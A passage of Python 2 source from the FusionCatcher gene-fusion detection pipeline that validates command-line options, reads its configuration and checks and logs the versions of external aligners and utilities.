sys.exit(1) if expand(options.output_directory) == expand(options.tmp_directory): parser.error("ERROR: Output and temporary paths should be different!") sys.exit(1) x1 = expand(options.output_directory) x2 = options.output_directory if x1.find(",") != -1 or x2.find(",") != -1: parser.error("ERROR: Output path contains comma(s)!") sys.exit(1) x1 = expand(options.tmp_directory) x2 = options.tmp_directory if x1.find(",") != -1 or x2.find(",") != -1: parser.error("ERROR: Temporary path contains comma(s)!") sys.exit(1) multiple_files = ["'%s' '%s'" % (sys.argv[i-1],sys.argv[i]) for i in xrange(1,len(sys.argv)) if ((not sys.argv[i-1].startswith('-')) and (not sys.argv[i].startswith('-')))] if multiple_files: print >>sys.stderr,"ERROR: There were found multiple parameters/values given for the same command line parameter (for example: two input files separated by blank)! " for mf in multiple_files: print >>sys.stderr,mf print >>sys.stderr,"POSSIBLE FIX: Please, give multiple parameters/values/filenames for the same command line option by separating them using comma(s)!" sys.exit(1) if options.batch_mode: cc = sys.argv[:] if cc[0].endswith('fusioncatcher.py'): cc[0].replace('fusioncatcher.py','fusioncatcher-batch.py') cc = [e for e in cc if e and e!='--batch'] r = os.system(' '.join(cc)) if r: print >>sys.stderr,"Error while running fusioncatcher-batch.py!" sys.exit(1) sys.exit(0) if options.normal_matched_filename: cc = sys.argv[:] tempo = adir(expand(options.tmp_directory)) if not os.path.exists(tempo): os.makedirs(tempo) tempo_input = os.path.join(tempo,'fusioncatcher-input.log') tempo_normal = os.path.join(tempo,'fusioncatcher-normal.log') file(tempo_input,'w').write(options.input_filename) file(tempo_normal,'w').write(options.normal_matched_filename) if cc[0].endswith('fusioncatcher.py'): cc[0] = cc[0][:-3]+'-batch.py' elif cc[0].endswith('fusioncatcher'): cc[0] = cc[0]+'-batch.py' dd = [] for ik in cc: if ik.find("=") == -1: dd.append(ik) else: gi = ik.split("=") dd.append(gi[0]) dd.append(gi[1]) next_i = False next_n = False com = [] for ik in dd: if ik == '-i' or ik == '--input': next_i = True continue if next_i: next_i = False continue if ik == '--normal' or ik == '-I': next_n = True continue if next_n: next_n = False continue com.append(ik) dn = com + ['--input',tempo_input,'--normal',tempo_normal] dn = ' '.join(dn) print "--------------------------" print dn print "--------------------------" r = os.system(dn) if r: print >>sys.stderr,"Error while running fusioncatcher-batch.py!" sys.exit(1) os.remove(tempo_input) os.remove(tempo_normal) shutil.rmtree(tempo) sys.exit(0) # # Reading the configuration file: "configuration.cfg" # config_files = [el for el in options.configuration_filename.split(",") if el and (os.path.isfile(el) or islink(el))] configfile = '' if config_files: configfile = config_files[0] # first one has priority confs = configuration.manage(configfile,skip_python=['openpyxl','xlrd']) if not options.data_directory: p = confs.get("DATA",None) if p and (os.path.isdir(p) or islink(p)): options.data_directory = p else: parser.error("ERROR: Argument '--data' needs to be specified as command line (or in 'configuration.cfg' file)!") sys.exit(1) # check if version of fusioncatcher.py matches the configuration.cfg file p = confs.get("FUSIONCATCHER",None) if p: t = parser.get_version() t = t.lower().split(".py") if t and len(t) == 2 and t[1].strip() == p.lower(): pass else: print >>sys.stderr,"................................................................................" print >>sys.stderr,"ERROR: The version of configuration.cfg file does not match the version of the fusioncatcher.py!" print >>sys.stderr,"Please, fix this!" print >>sys.stderr,"................................................................................" sys.exit(1) else: print >>sys.stderr,"................................................................................" print >>sys.stderr,"ERROR: The version of configuration.cfg file does not contain the version of the fusioncatcher.py!" print >>sys.stderr,"Please, fix this!" print >>sys.stderr,"................................................................................" sys.exit(1) if not options.processes: p = confs.get("THREADS",None) if p: options.processes = int(p) if not options.processes: options.processes = multiprocessing.cpu_count() options.processes = options.processes if options.processes < 17 else 16 config_aligners = confs.get("ALIGNERS","") if options.processes and options.processes > multiprocessing.cpu_count(): options.processes = multiprocessing.cpu_count() # getting absolute paths for the tools and scripts from configuration.cfg _B2_ = confs.get("BOWTIE2").rstrip("/")+"/" if options.force_paths else '' _BA_ = confs.get("BWA").rstrip("/")+"/" if options.force_paths else '' _BE_ = confs.get("BOWTIE").rstrip("/")+"/" if options.force_paths else '' _BT_ = confs.get("BLAT").rstrip("/")+"/" if options.force_paths else '' _BP_ = confs.get("BBMAP").rstrip("/")+"/" if options.force_paths else '' _FC_ = confs.get("SCRIPTS").rstrip("/")+"/" if options.force_paths else '' _FK_ = confs.get("FASTQTK").rstrip("/")+"/" if options.force_paths else '' _FT_ = confs.get("FATOTWOBIT").rstrip("/")+"/" if options.force_paths else '' _JA_ = confs.get("JAVA").rstrip("/")+"/" if options.force_paths else '' _LR_ = confs.get("LIFTOVER").rstrip("/")+"/" if options.force_paths else '' _OS_ = confs.get("OASES").rstrip("/")+"/" if options.force_paths else '' _PD_ = confs.get("PICARD").rstrip("/")+"/" if options.force_paths else '' _PL_ = confs.get("PARALLEL").rstrip("/")+"/" if options.force_paths else '' _PZ_ = confs.get("PIGZ").rstrip("/")+"/" if options.force_paths else '' _SA_ = confs.get("SRA").rstrip("/")+"/" if options.force_paths else '' _SK_ = confs.get("SEQTK").rstrip("/")+"/" if options.force_paths else '' _SS_ = confs.get("SAMTOOLS").rstrip("/")+"/" if options.force_paths else '' _SR_ = confs.get("STAR").rstrip("/")+"/" if options.force_paths else '' _VT_ = confs.get("VELVET").rstrip("/")+"/" if options.force_paths else '' # # DIRECTORIES # data_dir = adir(expand(options.data_directory)) out_dir = adir(expand(options.output_directory)) tmp_dir = adir(expand(options.tmp_directory)) log_file = expand(outdir('fusioncatcher.log')) info_file = expand(outdir('info.txt')) ################################################################################ # Managing OPTIONS ################################################################################ eporcrlf2igh = False if options.skip_mitochondrion_filtering: options.biotypes = options.biotypes.replace('mt','').replace(',,',',') if options.homolog == 0: options.biotypes = options.biotypes.replace('similar_reads','').replace(',,',',') if options.skip_adjacent and options.biotypes.find('adjacent') == -1: options.biotypes = options.biotypes + ',adjacent' if options.skip_banned_fusions: options.biotypes = options.biotypes.replace('banned','').replace(',,',',') options.biotypes = options.biotypes.replace('healthy','').replace(',,',',') if options.skip_blat: options.trim_blat = False options.psl_visualization = False options.skip_prefiltering_blat = False if options.keep_viruses: options.skip_viruses_filtering = False opt_alg = options.aligners if opt_alg.lower().find(".cfg") != -1: # found a configuration file oa = set([el for el in opt_alg.lower().split(',') if el.find('.cfg') != -1]) # try to read the configuration file if config_aligners: opt_alg = config_aligners else: opt_alg = ','.join(oa) alg = set([el for el in opt_alg.lower().split(',') ]) if (not options.skip_blat) and ('blat' not in alg): options.skip_blat = True if (not options.skip_star) and ('star' not in alg): options.skip_star = True if (not options.skip_bowtie2) and ('bowtie2' not in alg): options.skip_bowtie2 = True # if (not options.skip_bwa) and ('bwa' not in alg): # options.skip_bwa = True # if (not options.skip_spotlight) and ('spotlight' not in alg): # options.skip_spotlight = True # create the output directory if (not os.path.isdir(out_dir)) and (not islink(out_dir)): if os.path.isfile(out_dir): print >>sys.stderr, "ERROR: The output directory is a actually a file! Please, delete it before proceeding further!" sys.exit(1) else: os.makedirs(out_dir) # deal with temporary files flag temp_flag = 'yes' if options.keep_temporary_files or (options.hash and options.hash != 'no'): temp_flag = 'no' ################################################################################ # SENSITIVE ################################################################################ sensitive = 0 # if options.sensitive: # options.spanning_pairs = "2,2,2,2,2" # options.spanning_reads = "2,2,2,2,2" # options.length_anchor = "14,17,17,17,17" # options.length_anchor2 = 40 # sensitive = sensitive + 1 # ################################################################################ # # MILD SENSITIVE # ################################################################################ # if options.mildly_sensitive: # options.spanning_pairs = "2,2,2,2,2" # options.spanning_reads = "2,2,2,2,2" # options.length_anchor = "13,15,15,15,15" # options.length_anchor2 = 22 # options.mismatches = 2 # options.mismatches_psl = 4 # sensitive = sensitive + 1 # ################################################################################ # # HIGHLY SENSITIVE # ################################################################################ # if options.highly_sensitive: # options.spanning_pairs = "2,2,2,2,2" # options.spanning_reads = "1,1,1,1,1" # options.length_anchor = "13,14,14,14,14" # options.length_anchor2 = 22 # options.mismatches = 2 # options.mismatches_psl = 4 # options.skip_prefiltering_psl = True # sensitive = sensitive + 1 ################################################################################ # PARANOID SENSITIVE ################################################################################ if options.paranoid_sensitive: options.spanning_pairs = "2,2,2,2,2" options.spanning_reads = "1,1,1,1,1" options.length_anchor = "11,11,11,11,30" options.length_anchor2 = 22 options.mismatches = 2 #options.mismatches_psl = 4 #options.spanning_pairs_count = 20000 #options.homolog = 0 #options.skip_prefiltering_psl = True # options.all_reads_junction = True sensitive = sensitive + 1 if sensitive > 1: parser.error("ERROR: The command line options: '--paranoid-sensitive','--sensitive','--midly-sensitive','--highly-sensitive' are mutually exclusive!") sys.exit(1) eporcrlf2igh = False ################################################################################ spanning_pairs = options.spanning_pairs.split(',') if len(spanning_pairs) != 5: print >>sys.stderr, "ERROR: the command option SPANNING_PAIRS has been given incorrectly! Expecting 4 commas!" sys.exit(1) spanning_pairs_bowtie = int(spanning_pairs[0]) spanning_pairs_blat = int(spanning_pairs[1]) spanning_pairs_star = int(spanning_pairs[2]) spanning_pairs_bowtie2 = int(spanning_pairs[3]) # spanning_pairs_bwa = int(spanning_pairs[4]) spanning_pairs_spotlight = int(spanning_pairs[4]) spanning_pairs_minimum = min(map(int,spanning_pairs)) spanning_reads = options.spanning_reads.split(',') if len(spanning_reads) != 5: print >>sys.stderr, "ERROR: the command option SPANNING_READS has been given incorrectly! Expecting 4 commas!" sys.exit(1) spanning_reads_bowtie = int(spanning_reads[0]) spanning_reads_blat = int(spanning_reads[1]) spanning_reads_star = int(spanning_reads[2]) spanning_reads_bowtie2 = int(spanning_reads[3]) # spanning_reads_bwa = int(spanning_reads[4]) spanning_reads_spotlight = int(spanning_reads[4]) spanning_reads_minimum = min(map(int,spanning_reads)) length_anchor = options.length_anchor.split(',') if len(length_anchor) != 5: print >>sys.stderr, "ERROR: the command option LENGTH_ANCHOR has been given incorrectly! Expecting 4 commas!" sys.exit(1) length_anchor_bowtie = int(length_anchor[0]) length_anchor_blat = int(length_anchor[1]) length_anchor_star = int(length_anchor[2]) length_anchor_bowtie2 = int(length_anchor[3]) # length_anchor_bwa = int(length_anchor[4]) length_anchor_spotlight = int(length_anchor[4]) length_anchor_minimum = min(map(int,length_anchor)) length_anchor2 = options.length_anchor2 fragments_flag = False organism = file(datadir("organism.txt"),"r").readline().rstrip('\r\n').lower() if spanning_reads_minimum < 1: parser.error("ERROR: The minimum value of the SPANNING_READS is 1 but the value %s was given!" % (options.spanning_reads,)) sys.exit(1) if length_anchor_minimum < 10: parser.error("ERROR: The minimum value of the LENGTH_ANCHOR is 10 but the value %s was given!" % (options.length_anchor,)) sys.exit(1) if length_anchor2 <= length_anchor_minimum: parser.error("ERROR: --anchor-fusion2 (%d) should be larger than anchor-fusion (%s)!" % (options.length_anchor2,options.length_anchor)) sys.exit(1) if spanning_pairs_bowtie != spanning_pairs_minimum or spanning_pairs_bowtie < 1: parser.error("ERROR: The minimum value of the SPANNING_PAIRS should have values larger than 2 but the value %s was given!" % (options.spanning_pairs,)) sys.exit(1) if options.skip_star_bowtie and (not is_optparse_provided(parser,'limit_star')): options.limit_star = int(2.7 * (2**30)) if options.trim_3end_keep2 != 0: if options.trim_3end_keep2 + length_anchor_minimum > options.trim_3end_keep and options.trim_3end_keep2 < 20: print >>sys.stderr, "ERROR: The trimming options are given wrong! See '--trim_3end_keep' and '--trim_3end_keep2' for info!" sys.exit(1) # test that the version of build data matches if empty(datadir('version.txt')) or ( not os.path.exists(datadir('transcripts.fa'))) or ( not os.path.exists(datadir('genes.txt'))): print >>sys.stderr,"\n\n" print >>sys.stderr,"ERROR: The build data not found in '%s'!" % (data_dir,) print >>sys.stderr,"\n\n" sys.exit(1) print "Checking FusionCatcher version..." ################################################################################ # Contacts the FusionCatcher server to check for a more recent version ################################################################################ old = [] if not options.skip_update_check: try: import socket import urllib2 timeout = 10 socket.setdefaulttimeout(timeout) #serverversion = urllib2.urlopen('http://fusioncatcher.hopto.org/fusioncatcher-version.txt').read() serverversion = None if serverversion: serverversion = serverversion.splitlines() serverversion = serverversion[0].strip() version = parser.get_version() if serverversion != version: old = ["", "="*80, "WARNING: This is an OLD version of FusionCatcher! There is a newer", " version available! Please, update to the newest version!", "" " - Current version: %s" % (version.replace('fusioncatcher.py','').strip(),), " - New version: %s"% (serverversion.replace('fusioncatcher.py','').strip(),), "="*80, "" ] file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in old]) print >>sys.stderr,'\n'.join(old) except: pass ################################################################################ # Initialize pipeline ################################################################################ import workflow # job = workflow.pipeline( log_filename = log_file, checksums_filename = options.checksums_filename, hash_library = options.hash, start_step = options.start_step) ############################################################################## # SAVE EXTRA INFORMATION ############################################################################## os.system("set +e") # make sure that the shell scripts are still executed even if there are errors # save version of FusionCatcher job.add('printf',kind='program') job.add(('"\n================================================\n'+ 'Software version: %s\n'+ '================================================\n\n\n"') % ( parser.get_version(),), kind='parameter') job.add('>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nSoftware version: %s\n"' % (parser.get_version(),), kind='parameter') job.add('>>',log_file,kind='output') job.run() # create the temporary directory if job.run(): if not os.path.isdir(tmp_dir) and not islink(tmp_dir): os.makedirs(tmp_dir) # check options supported by SORT command sort_parallel = False r = os.system("sort --help | grep 'parallel' > "+outdir('sort_help.txt')) if (not r) and (not empty(outdir('sort_help.txt'))) and len(file(outdir('sort_help.txt'),'r').readlines()) == 1: sort_parallel = True delete_file(outdir('sort_help.txt')) # check options supported by SORT command sort_buffer = None r = os.system("sort --help | grep 'buffer-size' > "+outdir('sort_help.txt')) if (not r) and (not empty(outdir('sort_help.txt'))) and len(file(outdir('sort_help.txt'),'r').readlines()) == 1: if not is_optparse_provided(parser,'sort_buffer_size'): # here is the automatic setting mem = memory(unit="gb") mt = mem['total'] if mt and mt > 33: sort_buffer = "26G" else: sort_buffer = options.sort_buffer_size #"80%" else: sort_buffer = options.sort_buffer_size #"80%" delete_file(outdir('sort_help.txt')) # check options suppported by SORT command sort_lzop_compress = False r = os.system("sort --help | grep 'compress-program' > "+outdir('sort_help.txt')+ " ; lzop --help 2>/dev/null | grep -i 'compress' > " +outdir('lzop_help.txt')) if (not r) and ((not empty(outdir('sort_help.txt'))) and len(file(outdir('sort_help.txt'),'r').readlines()) == 1 and (not empty(outdir('lzop_help.txt'))) and len(file(outdir('lzop_help.txt'),'r').readlines()) >= 1): sort_lzop_compress = True delete_file(outdir('sort_help.txt')) delete_file(outdir('lzop_help.txt')) # check options suppported by SORT command sort_gzip_compress = False r = os.system("sort --help | grep 'compress-program' > "+outdir('sort_help.txt')+ " ; gzip --help 2>/dev/null | grep -i 'compress' > " +outdir('gzip_help.txt')) if (not r) and ((not empty(outdir('sort_help.txt'))) and len(file(outdir('sort_help.txt'),'r').readlines()) == 1 and (not empty(outdir('gzip_help.txt'))) and len(file(outdir('gzip_help.txt'),'r').readlines()) >= 1): sort_gzip_compress = True delete_file(outdir('sort_help.txt')) delete_file(outdir('gzip_help.txt')) # disable any compression done by SORT ===> FASTER sort_lzop_compress = False sort_gzip_compress = False # check if PIGZ is installed pigz = False r = os.system(_PZ_+"pigz --version 2>/dev/null") if (not r): pigz = True # check if PXZ is installed pxz = False r = os.system("pxz --version 2>/dev/null") if (not r): pxz = True # save version of ENSEMBL used to analyse this data info(job, fromfile = datadir('version.txt'), tofile = info_file, top = ["===================================", "GENOME INFORMATION:", "==================================="], bottom = "\n") # job.add('printf',kind='program') # job.add('"\n============\nGENOME:\n============\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',datadir('version.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # save the genome fasta files used info(job, fromfile = datadir('genome_information.txt'), tofile = info_file, top = ["===================================", "Genome FASTA files:", "==================================="], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add('"\nGenome FASTA files:\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',datadir('genome_information.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if not os.system("cat /etc/issue 2>&1 >/dev/null"): job.add('printf',kind='program') job.add('"\nLinux:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('cat',kind='program') job.add('/etc/issue',kind='parameter') job.add('2>&1',kind='parameter') job.add('>>',info_file,kind='output') job.run() # save version of Python used to analyze this data job.add('printf',kind='program') job.add('"\nPython:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_FC_+'python_version.py',kind='program') job.add('>>',info_file,kind='output') job.run(error_message=("Please, check if 'Python' (from "+ "<http://python.org/>) is installed (or if 'configuration.cfg' file "+ "is set up correctly)!")) # save version of BioPython used to analyze this data job.add('printf',kind='program') job.add('"\nBioPython:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_FC_+'biopython_version.py',kind='program') job.add('>>',info_file,kind='output') job.run(error_message=("Please, check if 'BioPython' (from "+ "<http://biopython.org/>) is installed (or if 'configuration.cfg' file "+ "is set up correctly)!")) # save version of BOWTIE used to analyze this data job.add('printf',kind='program') job.add('"\n===========\nTOOLS:\n===========\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nSORT:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('sort',kind='program') job.add('--version',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() os.system(_BE_+"bowtie --version | head -1 > '%s'" % (outdir('bowtie_version.txt'),)) last_line = file(outdir('bowtie_version.txt'),'r').readline().lower().rstrip("\r\n") #correct_versions = set(['bowtie-align version 1.2.1','bowtie-align version 1.2.1.1','bowtie-align version 1.2','bowtie version 1.1.2']) correct_versions = set(['version 1.2','version 1.1.2','version 1.2.2','version 1.2.3','version 1.3.0']) bowtie121 = False if last_line.find("1.2.") != -1: bowtie121 = True bowtie123 = False if (last_line.find("1.2.3") != -1) or (last_line.find("1.3.0")) or (last_line.find("1.2.") != -1 and last_line.find("1.2.1") == -1 and last_line.find("1.2.2") == -1): # add here other newer versions of Bowtie bowtie123 = True # this version of Bowtie suports indexes from Bowtie2 if (last_line not in correct_versions) and not [1 for el in correct_versions if last_line.lower().endswith(el)]: print last_line job.close() os.system("which bowtie > '%s'" % (outdir('bowtie_path.txt'),)) bowtie_path = file(outdir('bowtie_path.txt'),'r').readline().rstrip("\r\n") print >>sys.stderr,("\n\n\nERROR: Wrong version of BOWTIE found ("+bowtie_path+")! It should be: "+', '.join(sorted(correct_versions))+".") print >>sys.stderr,("\nERROR: One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg',") print >>sys.stderr,("\nERROR: like for example change manually the line fusioncatcher/tools/bowtie to fusioncatcher/tools/bowtie-old") print >>sys.stderr,("\nERROR: Also it may be that some of Bowtie's dependencies are missing.") print >>sys.stderr,("\nERROR: Therefore also make sure that Bowtie's dependencies are installed, like for example:") print >>sys.stderr,("\nERROR: sudo apt-get install libtbb-dev libtbb2 libc6-dev") print >>sys.stderr,("\nERROR: or") print >>sys.stderr,("\nERROR: sudo yum install libtbb-devel libtbb2 libc6-devel") sys.exit(1) os.remove(outdir('bowtie_version.txt')) job.add('printf',kind='program') job.add('"\nBOWTIE:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--version',kind='parameter') job.add('|',kind='parameter') job.add('head','-2',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message=("Please, check if 'Bowtie' (from "+ "<http://bowtie-bio.sourceforge.net/index.shtml>) is installed and it "+ "is in the corresponding PATH!")) job.add('printf',kind='program') job.add('"\nBBMAP:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_BP_+'bbversion.sh',kind='program') # job.add('--version',kind='parameter') # job.add('2>>',info_file,kind='output') job.add('>>',info_file,kind='output') job.run(error_message=("Please, check if 'BBMAP' (from "+ "<https://sourceforge.net/projects/bbmap>) is installed and it "+ "is in the corresponding PATH!")) # check version os.system(_BP_+"bbversion.sh > '%s'" % (outdir('bbmap_version.txt'),)) last_line = file(outdir('bbmap_version.txt'),'r').readline().lower().rstrip("\r\n") correct_version = ('38.44',) if last_line not in correct_version: job.close() os.system("which bbversion.sh > '%s'" % (outdir('bbmap_path.txt'),)) bbmap_path = file(outdir('bbmap_path.txt'),'r').readline().rstrip("\r\n") print >>sys.stderr,"\n\n\nERROR: Wrong version of BBMAP found ("+bbmap_path+")! Found '"+last_line+"'. It should be '"+', or'.join(correct_version)+"'. One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg'.\n" sys.exit(1) os.remove(outdir('bbmap_version.txt')) job.add('printf',kind='program') job.add('"\nPIGZ:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if pigz: job.add(_PZ_+'pigz',kind='program') job.add('--version',kind='parameter') #job.add('2>&1',kind='parameter') job.add('2>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nPXZ:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if pxz: job.add('pxz',kind='program') job.add('--version',kind='parameter') job.add('2>&1',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nfastq-dump (from SRA Toolkit):\n--------------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if not os.system("which fastq-dump 2>&1 >/dev/null"): job.add(_SA_+'fastq-dump',kind='program') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('tail','-2',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nGNU Parallel:\n--------------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if not os.system("which parallel 2>&1 >/dev/null"): job.add(_PL_+'parallel',kind='program') job.add('--version',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() parsort = False parsort_buffer_size = "" if options.processes > 3 and (not options.skip_parsort) and (not os.system("which parsort 2>&1 >/dev/null")): #parsort = True # not wort it ; faster by few seconds parsort = False vux = int(float(80) / float(options.processes)) # it is 80 because 80% is my maximum which I want to be used from the RAM if total_memory and float(total_memory) * float(vux)/float(100) > 6000 and sort_parallel: parsort_buffer_size = str(vux)+"%" job.add('printf',kind='program') job.add('"\nSAMTools:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if not os.system("which samtools 2>&1 >/dev/null"): job.add(_SS_+'samtools',kind='program') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-3',kind='parameter') job.add('|',kind='parameter') job.add('tail','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nJava:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if not os.system("which java 2>&1 >/dev/null"): job.add('java',kind='program') job.add('--version',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nliftOver:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if not os.system("which liftOver 2>&1 >/dev/null"): job.add(_LR_+'liftOver',kind='program') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nSeqTK:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-3',kind='parameter') job.add('|',kind='parameter') job.add('tail','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() # check version os.system(_SK_+"seqtk 2>&1 |head -3 |tail -1 > '%s'" % (outdir('seqtk_version.txt'),)) last_line = file(outdir('seqtk_version.txt'),'r').readline().lower().rstrip("\r\n") # correct_version = ('version: 1.0-r68e-dirty','version: 1.0-r82b-dirty') #correct_version = ('version: 1.0-r82b-dirty','version: 1.2-r101b-dirty','version: 1.2-r101c-dirty') correct_version = ('version: 1.2-r101c-dirty',) if last_line not in correct_version: job.close() os.system("which seqtk > '%s'" % (outdir('seqtk_path.txt'),)) seqtk_path = file(outdir('seqtk_path.txt'),'r').readline().rstrip("\r\n") print >>sys.stderr,"\n\n\nERROR: Wrong version of SeqTK found ("+seqtk_path+")! Found '"+last_line+"'. It should be '"+', or'.join(correct_version)+"'. One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg'.\n" sys.exit(1) os.remove(outdir('seqtk_version.txt')) job.add('printf',kind='program') job.add('"\nfastqtk:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_FK_+'fastqtk',kind='program') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-3',kind='parameter') job.add('|',kind='parameter') job.add('tail','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() # check version os.system(_SK_+"fastqtk 2>&1 |head -3 |tail -1 > '%s'" % (outdir('fastqtk_version.txt'),)) last_line = file(outdir('fastqtk_version.txt'),'r').readline().lower().rstrip("\r\n") # correct_version = ('version: 1.0-r68e-dirty','version: 1.0-r82b-dirty') #correct_version = ('version: 1.0-r82b-dirty','version: 1.2-r101b-dirty','version: 1.2-r101c-dirty') correct_version = ('version: 0.27',) if last_line not in correct_version: job.close() os.system("which fastqtk > '%s'" % (outdir('fastqtk_path.txt'),)) fastqtk_path = file(outdir('fastqtk_path.txt'),'r').readline().rstrip("\r\n") print >>sys.stderr,"\n\n\nERROR: Wrong version of fastqtk found ("+fastqtk_path+")! Found '"+last_line+"'. It should be '"+', or'.join(correct_version)+"'. One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg'.\n" sys.exit(1) os.remove(outdir('fastqtk_version.txt')) job.add('printf',kind='program') job.add('"\nsed:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('sed',kind='program') job.add('--version',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nawk:\n---------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('awk',kind='program') job.add('-Wversion',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.add('||',kind='parameter') job.add('awk',kind='parameter') job.add('--version',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run() if not options.skip_blat: # save version of BLAT used to analyze the data job.add('printf',kind='program') job.add('"\nBLAT:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_BT_+'blat',kind='program') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if BLAT (from "+ "<http://users.soe.ucsc.edu/~kent/src/> and "+ "<http://hgdownload.cse.ucsc.edu/admin/exe/>) is installed correctly and it "+ "is in the corresponding PATH (or if 'configuration.cfg' file is "+ "set up correctly)!\n If there is no wish to use BLAT aligner then please "+ "(re)run FusionCatcher using command line option '--skip-blat'.\n"+ "Please, also read its commercial "+ "license <http://www.kentinformatics.com/> if this applies in your case!")) # save version of faToTwoBit from BLAT used to analyze the data job.add('printf',kind='program') job.add('"\nfaToTwoBit (from BLAT toolbox):\n----------------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_FT_+'faToTwoBit',kind='program') job.add('2>&1',kind='parameter') job.add('>','/dev/null',kind='parameter') job.add('|',kind='parameter') job.add('head','-1',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if faToTwoBit (from BLAT toolbox, here: "+ "<http://users.soe.ucsc.edu/~kent/src/> and "+ "<http://hgdownload.cse.ucsc.edu/admin/exe/>) is installed correctly and it "+ "is in the corresponding PATH (or if 'configuration.cfg' file is "+ "set up correctly)!\n If there is no wish to use BLAT aligner then please "+ "(re)run FusionCatcher using command line option '--skip-blat'.\n"+ "Please, also read its commercial "+ "license <http://www.kentinformatics.com/> if this applies in your case!")) star25 = False if not options.skip_star: # save version of BLAT used to analyze the data job.add('printf',kind='program') job.add('"\nSTAR:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_SR_+'STAR',kind='program') job.add('--version',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if STAR (from "+ "<https://github.com/alexdobin/STAR> and "+ "<https://github.com/alexdobin/STAR/releases>) is installed correctly and it "+ "is in the corresponding PATH (or if 'configuration.cfg' file is "+ "set up correctly)!\n If there is no wish to use STAR aligner then please "+ "(re)run FusionCatcher using command line option '--skip-star'.")) os.system(_SR_+"STAR --version > '%s'" % (outdir('star_version.txt'),)) last_line = file(outdir('star_version.txt'),'r').readline().lower().rstrip("\r\n") correct_version = '2.7.2b' #correct_version = '2.7.0f' #correct_version = 'star_2.5.4b' #correct_version = 'star_2.5.2b' #correct_version = 'star_2.5.2a' #correct_version = 'star_2.5.1b' #correct_version = 'star_2.4.2a' if not (correct_version.lower().startswith('star_2.1.') or correct_version.lower().startswith('star_2.2.') or correct_version.lower().startswith('star_2.3.') or correct_version.lower().startswith('star_2.4.')): star25 = True if last_line != correct_version: job.close() os.system("which STAR > '%s'" % (outdir('star_path.txt'),)) star_path = file(outdir('star_path.txt'),'r').readline().rstrip("\r\n") print >>sys.stderr,"\n\n\nERROR: Wrong version of STAR found ("+star_path+")! It should be '"+correct_version+"'. One may specify the path to the correct version in 'fusioncatcher/etc/configuration.cfg'.\n" 